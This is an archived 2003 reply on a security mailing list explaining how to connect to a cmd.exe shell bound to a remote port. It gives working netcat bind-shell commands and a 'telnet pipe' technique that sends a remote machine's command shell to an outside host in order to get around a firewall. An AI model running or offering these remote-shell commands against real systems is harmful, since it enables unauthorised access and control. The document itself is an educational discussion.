Re: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?
From: DownBload (downbload_at_hotmail.com)
Date: 11/08/03
- Previous message: Kelly Martin: "SecurityFocus new article announcement"
- Maybe in reply to: Mark G. Spencer: "How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"
- Next in thread: Golden_Eternity: "RE: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 8 Nov 2003 10:20:41 -0000 To: security-basics@securityfocus.com('binary' encoding is not supported, stored as-is) In-Reply-To: <20031106153902.26988032.mspencer@evidentdata.com>
>From: "Mark G. Spencer" <mspencer@evidentdata.com>
>I've been looking at some perl scripts that purport to create cmd.exe shells bound to a tcp port on a remote machine. I'm curious, how would someone connect to these shells? The code looks very compact, I wouldn't imagine you could just http to the port bound with cmd.exe? Perhaps telnet? Is this how Code Red and Nimda were operating?
The best tool for such things is NetCat.
Just run it as 'nc.exe -l -v -p 31337 -e cmd.exe' and you will have shell on tcp port 31337. When you want to connect to that host and port, use again NetCat, but now as 'nc.exe remote_host.com 31337' and you have shell.
In some cases (like with firewalled machines) you can use "telnet pipe" technique to bypass firewall.
First run two instance of nc.exe on your machine, like this:
nc.exe -l -v -p 31337
nc.exe -l -v -p 31338
(each in spearated window)
Now on remote machine do something like "telnet your_host.com 31337 | cmd.exe | telnet your_host.com 31338"
Write commands in first window on your machine, and output will be in second window.
------------------------------------
DownBload / Illegal Instruction Labs
Security Research & Education
http://www.ii-labs.org
e-mail:downbload[at]hotmail.com
, ,
/| |\
\\.....// "Born under the lucky star magical,
|.\ /.| but on this earth generally tragical."
\\^//
o_o
`
Check our wargame: http://www.ii-labs.org/wargame/
---------------------------------------------------------------------------
Forum Systems PRESIDIO: PGP / XML GATEWAY APPLIANCE
The Presidio integrates PGP data encryption and XML Web Services security to
simplify the management and deployment of PGP and reduce overall PGP costs
by up to 80%.
FREE WHITEPAPER & 30 Day Trial -
http://www.securityfocus.com/sponsor/ForumSystems_security-basics_031027
----------------------------------------------------------------------------
- Previous message: Kelly Martin: "SecurityFocus new article announcement"
- Maybe in reply to: Mark G. Spencer: "How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"
- Next in thread: Golden_Eternity: "RE: How does one connect to a shell (cmd.exe) bound to a port on a remote machine?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
